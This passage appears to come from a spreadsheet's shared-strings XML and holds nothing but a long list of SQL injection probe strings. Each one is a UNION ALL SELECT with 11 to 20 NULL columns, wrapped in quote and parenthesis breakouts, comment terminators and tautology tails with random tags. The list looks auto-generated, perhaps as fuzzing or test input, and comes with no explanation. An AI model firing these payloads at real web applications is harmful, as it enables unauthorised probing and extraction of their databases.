    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'uZXP' = 'uZXP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'nOxH' LIKE 'nOxH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'WOYA' LIKE 'WOYA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'pJrI' LIKE 'pJrI</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'SDjz' LIKE 'SDjz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'wlne' LIKE 'wlne</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'JFbK' LIKE 'JFbK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'weEU' LIKE 'weEU</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'tSQn' LIKE 'tSQn</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'vfvw' LIKE 'vfvw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ZMLN' LIKE 'ZMLN</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'lOgk' LIKE 'lOgk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'WMFH' LIKE 'WMFH</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'WWgC' LIKE 'WWgC</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'jRNP' LIKE 'jRNP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'RTmC' LIKE 'RTmC</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'NVCQ' LIKE 'NVCQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'MEDp' LIKE 'MEDp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'kRvl' LIKE 'kRvl</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'mnNc' LIKE 'mnNc</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'ZrpR' LIKE 'ZrpR</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'vHKJ' LIKE 'vHKJ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'sPbK' LIKE 'sPbK</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ciLF' LIKE 'ciLF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'dywa' LIKE 'dywa</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'CbeF' LIKE 'CbeF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'EMDM' LIKE 'EMDM</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'swJQ' LIKE 'swJQ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'KLPu' LIKE 'KLPu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Tmhn' LIKE 'Tmhn</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'CNzZ' LIKE 'CNzZ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'PXTv' LIKE 'PXTv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'vMDB' LIKE 'vMDB</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'MRiT' LIKE 'MRiT</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'XPOh' LIKE 'XPOh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'CPYS' LIKE 'CPYS</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'AtUg' LIKE 'AtUg</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'pnfJ' LIKE 'pnfJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'miWS' LIKE 'miWS</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Xjjr' LIKE 'Xjjr</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'PeTp' LIKE 'PeTp</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "vQSj" = "vQSj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "uwKU" = "uwKU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qxZz" = "qxZz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "OGYi" = "OGYi</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "zrYy" = "zrYy</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "IHqw" = "IHqw</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "QrlH" = "QrlH</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "LKVG" = "LKVG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "YKsE" = "YKsE</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "NwrO" = "NwrO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "XJEF" = "XJEF</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "kHTc" = "kHTc</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "NFfY" = "NFfY</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "tAJf" = "tAJf</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "nRff" = "nRff</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "ZKCe" = "ZKCe</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "cyjz" = "cyjz</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "hvqB" = "hvqB</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "xzOZ" = "xzOZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "toUq" = "toUq</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Sjdz" = "Sjdz</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "mfYC" = "mfYC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "RZPv" = "RZPv</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "mfvp" = "mfvp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "KTmU" = "KTmU</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "xdjT" = "xdjT</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "OQmA" = "OQmA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ffQs" = "ffQs</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "GDYP" = "GDYP</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "OHgN" = "OHgN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "UoGr" = "UoGr</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "LQtl" = "LQtl</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "rMig" = "rMig</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Nmxr" = "Nmxr</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "coxD" = "coxD</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "BgUV" = "BgUV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "AWVl" = "AWVl</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "UqLp" = "UqLp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "tDaH" = "tDaH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "OuMi" = "OuMi</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "hxbC" LIKE "hxbC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Judh" LIKE "Judh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "JJdQ" LIKE "JJdQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qzND" LIKE "qzND</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "aTkN" LIKE "aTkN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "itKA" LIKE "itKA</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "yaIL" LIKE "yaIL</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "znHw" LIKE "znHw</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "yTSP" LIKE "yTSP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qCYS" LIKE "qCYS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Hapo" LIKE "Hapo</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "pqnl" LIKE "pqnl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "RtbA" LIKE "RtbA</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "VEBX" LIKE "VEBX</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "bXBT" LIKE "bXBT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "YEzk" LIKE "YEzk</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "AlYW" LIKE "AlYW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "KpEE" LIKE "KpEE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "SZKC" LIKE "SZKC</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "hrfZ" LIKE "hrfZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "gbES" LIKE "gbES</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ZXYw" LIKE "ZXYw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Bori" LIKE "Bori</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "gevZ" LIKE "gevZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "uBRi" LIKE "uBRi</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "DsCp" LIKE "DsCp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "jXci" LIKE "jXci</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "lwXp" LIKE "lwXp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Pfwm" LIKE "Pfwm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "pySu" LIKE "pySu</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "TFeA" LIKE "TFeA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "hcWe" LIKE "hcWe</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ETvV" LIKE "ETvV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "qkzN" LIKE "qkzN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "XITG" LIKE "XITG</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "trSs" LIKE "trSs</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "jUEP" LIKE "jUEP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "qPTz" LIKE "qPTz</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "BGOV" LIKE "BGOV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "tBjV" LIKE "tBjV</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2484 = 2484</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6610 = 6610</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3979 = 3979</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 9254 = 9254</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 8678 = 8678</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6505 = 6505</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7610 = 7610</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2396 = 2396</t>
  </si>
  <si>
